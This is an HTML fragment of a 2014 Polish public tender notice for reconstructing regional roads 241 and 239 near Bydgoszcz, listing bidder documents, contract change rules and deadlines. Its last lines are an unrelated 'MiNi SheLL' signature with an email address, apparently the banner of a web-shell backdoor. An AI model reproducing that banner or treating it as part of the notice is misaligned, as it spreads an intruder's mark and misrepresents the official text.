<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty należy załączyć:
1.	Wypełniony i podpisany FORMULARZ OFERTY zawierający w szczególności cenę ofertową za przedmiot zamówienia oraz wykaz dotyczący podwykonawstwa  wg załącznika nr 1 do SIWZ 
2.	Wypełniony i podpisany KOSZTORYS OFERTOWY (odpowiednio dla każdego zadania).
3.	W przypadku ustanowienia pełnomocnika do podpisywania oferty winno być dołączone pełnomocnictwo  (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) o ile nie wynika ono z innych dokumentów dołączonych do oferty;
4. Do oferty wspólnej winien być dołączony dokument wskazujący pełnomocnika 
do reprezentowania wykonawców w postępowaniu albo do reprezentowania wykonawców 
w postępowaniu i podpisania mowy. Pełnomocnictwo musi być podpisane przez pozostałych wykonawców;
5. Oryginalne lub notarialnie podpisane ZOBOWIĄZANIE innego podmiotu, a w przypadku 
podmiotów trzecich biorących udział w części realizacji zamówienia dokument potwierdzający
udział podmiotu w realizacji zamówienia - jeśli występuje (Załącznik nr 8 do SIWZ - opcjonalnie);
6. Dowód wniesienia wadium (odpowiednio dla każdego zadania). Wadium wnoszone w postaci niepieniężnej należy złożyć w oryginalnym egzemplarzu bezpośrednio do oferty. 
Zaleca się zamieścić dokument wadialny w taki sposób aby jego zwrot przez Zamawiającego 
nie naruszył integralności oferty i dołączonych oświadczeń wraz z dokumentami 
(np. umieszczony w oprawie foliowej), co pozwoli na swobodne oddzielenie wadium od reszty dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający wymaga zawarcia umowy w sprawie zamówienia publicznego 
na warunkach określonych we wzorze Istotnych Postanowień Umowy będącej załącznikiem 
nr 9 do niniejszej SIWZ, co Wykonawca potwierdza w formularzu oferty.

2. Wszelkie  zmiany  i  uzupełnienia  treści  umowy  wymagają  dla  swej  ważności formy pisemnej  w  postaci  aneksu  podpisanego  przez  obie  strony dotyczących w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:

2.1.   Zmiana terminu realizacji zamówienia:
a) warunki atmosferyczne odbiegające od typowych (np. długotrwałe, obfite opady deszczu lub śniegu,  niskie temperatury w dzień i w nocy oraz inne), uniemożliwiające wykonanie przedmiotu zamówienia zgodnie z SST;
b) zlecanie przez Zamawiającego prac dodatkowych, których nie można było przewidzieć wcześniej, przy czym są one niezbędne do ukończenia zamierzenia budowlanego, uzyskania 
w całości finalnego dzieła zgodnego z projektem wykonawczym, przepisami prawa oraz zasadami wiedzy technicznej;  
c) prace objęte umową, zostały wstrzymane przez właściwy organ, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy;

2.2.  	Zmiana podwykonawcy - na pisemny wniosek Wykonawcy, dopuszcza się zmianę podwykonawcy, wprowadzenie nowego podwykonawcę lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zmiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń podwykonawcy wobec Wykonawcy z tytułu realizacji robót. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę.  

2.3.  	Zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy, których nie można było przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy, a których zmiana ma bezpośredni wpływ na wykonanie umowy np. gdyby wskutek wydarzeń losowych osoby wskazane w umowie nie mogły pełnić swoich czynności w okresie obowiązywania umowy;
W przypadku osób sprawujących nadzór nad realizacją umowy ze strony Wykonawcy zmiana którejkolwiek z osób musi być uzasadniona przez Wykonawcę na piśmie i zaakceptowana pisemnie przez Zamawiającego. Zamawiający zaakceptuje zmianę  wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji 
i doświadczenia osób wskazanych w ofercie Wykonawcy, a dokonana zmiana nie spowoduje wydłużenia terminu wykonania przedmiotu umowy.

2.4. 	Zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych             w treści umowy.
2.5. Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ 
na termin realizacji zamówienia.
2.6. Zamiany polegające na wystąpieniu robót zamiennych z przyczyn o charakterze technologicznym, jeżeli wprowadzenie robót zamiennych jest konieczne do prawidłowego wykonania umowy oraz nie powoduje rozszerzenia przedmiotu zamówienia w stosunku 
do przedmiotu określonego w SIWZ oraz wynikającego z treści oferty. 

2.7.	Zmiany wynagrodzenia w przypadku: 
a) zmiany obowiązującej stawki podatku od towarów i usług (VAT);

3. Zmiany uzasadnione okolicznościami, o których mowa w art. 357 1 k.c. - Jeżeli  z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażąco stratą, czego strony nie przewidziały przy zawarciu umowy, sąd może po rozważeniu interesów stron, zgodnie z zasadami współżycia społecznego, oznaczać sposób wykonania zobowiązania, wysokość świadczenia lub nawet orzec o rozwiązaniu umowy.

4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.

5. Natomiast nie stanowi zmiany umowy w rozumieniu art. 144 ustawy PZP: 
a) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana  rachunku bankowego); 
b) zmiana danych teleadresowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zdw-bydgoszcz.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Bydgoszczy, ul. Fordońska 6, 85-085 Bydgoszcz, pokój nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2014 godzina 09:45, miejsce: Zarząd Dróg Wojewódzkich w Bydgoszczy, ul. Fordońska 6, 85-085 Bydgoszcz, pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z EFRR w ramach RPO Województwa Kujawsko - Pomorskiego 
na lata 2007-2013, oś priorytetowa I - Rozwój Infrastruktury Technicznej, 
działanie 1.1 - Infrastruktura Drogowa. 
Zamawiający unieważni postępowanie w sytuacji, gdy wystąpią przesłanki wskazane 
w art. 93 ust.1 oraz art. 93 ust. 1 pkt 1a) ustawy Pzp..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1: Przebudowa drogi wojewódzkiej nr 241 Tuchola - Rogoźno odcinek Wiele - Mrocza od km 49+600 do km 55+610.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zamówienia należy wykonać:
Zadanie 1
A) branża drogowa
- roboty rozbiórkowe
- wykonanie wzmocnienia jezdni o nawierzchni bitumicznej szer. 6.0m (w-wa ścieralna gr. 5cm, w-wa 
- wiążąca gr. 8cm, w-wa wyrównawcza min. 4cm z betonu asfaltowego)
- wykonanie nowej jezdni (w-wa ścieralna gr. 5cm SMA, siatka wzmacniająca konstrukcję, w-wa wiążąca gr. 5cm, podbudowa zasadnicza z betonu asfaltowego, podbudowa pomocnicza z kruszywa  łamanego, w-wa gruntu stabilizowanego cementem gr. 15cm)
- wykonanie chodnika z kostki brukowej betonowej gr. 8cm
- wykonanie zjazdów o nawierzchniach z betonu asfaltowego i kostki brukowej betonowej,
- wykonanie 6 zatok autobusowych o nawierzchni z kostki betonowej szer. 3,00 wraz z peronami dł. 20,00m i szer. 1,5m,
- ściek z płyt prefabrykowanych trójkątnych,
- mury oporowe z prefabrykatów typu L 750mm oraz z gazonów prefabr. 50x30x30cm,
- wykonanie poboczy o szer. 1,25m i gr. 15,00cm,
- odtworzenie rowów z obsianiem trawą,
- wycinka drzew w pasie drogowym,
- oznakowanie pionowe i poziome,

B) branża mostowa
- wzmocnienie konstrukcji przęsła,
- wykonanie nowej izolacji,
- zamocowanie płyt przejściowych,
- rozbiórka i wykonanie obmurowania przyczółków,
- istniejących i zamocowanie nowych balustrad i barier drogowych,
- wykonanie nowych nawierzchni drogi i chodnika na obiekcie,
- naprawa przejścia wzdłuż cieku wodnego pod mostem,
- naprawa stożków skarpowych z ich umocnieniem,
- włączenie odwodnienia obiektu w system odwodnienia remontowanej drogi.

- promocja: 2 tablice informacyjne i 2 tablice pamiątkowe w ramach kosztów pośrednich Wykonawcy wraz z jednokrotną zmianą treści tablicy w ciągu 6 m-cy po ustawieniu tablicy pamiątkowej. Zmiana nastąpi poprzez naklejenie nowej wartości robót.

Wytyczne na stronie: http://www.mojregion.eu/regionalny-program-operacyjny-wojewodztwa-kujawsko-pomorskiego/promocja/oznakowanie-projektu.html.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2: Przebudowa drogi wojewódzkiej nr 239 Błądzim - Świecie odcinek Gródek - Krąplewice od km 19+750 do km 22+198.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2
- przebudowa jezdni poprzez wykonanie poszerzenia obustronnego po 1,0 m i wzmocnienie konstrukcji jezdni odpowiadające wymaganiom dla KR-3,
-  przebudowa poboczy,
-  przebudowa nawierzchni istniejących zjazdów,
-  profilowanie skarp rowów,
- promocja: 2 tablice informacyjne i 2 tablice pamiątkowe w ramach kosztów pośrednich Wykonawcy wraz z jednokrotną zmianą treści tablicy w ciągu 6 m-cy po ustawieniu tablicy pamiątkowej. Zmiana nastąpi poprzez naklejenie nowej wartości robót.

Wytyczne na stronie: http://www.mojregion.eu/regionalny-program-operacyjny-wojewodztwa-kujawsko-pomorskiego/promocja/oznakowanie-projektu.html.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com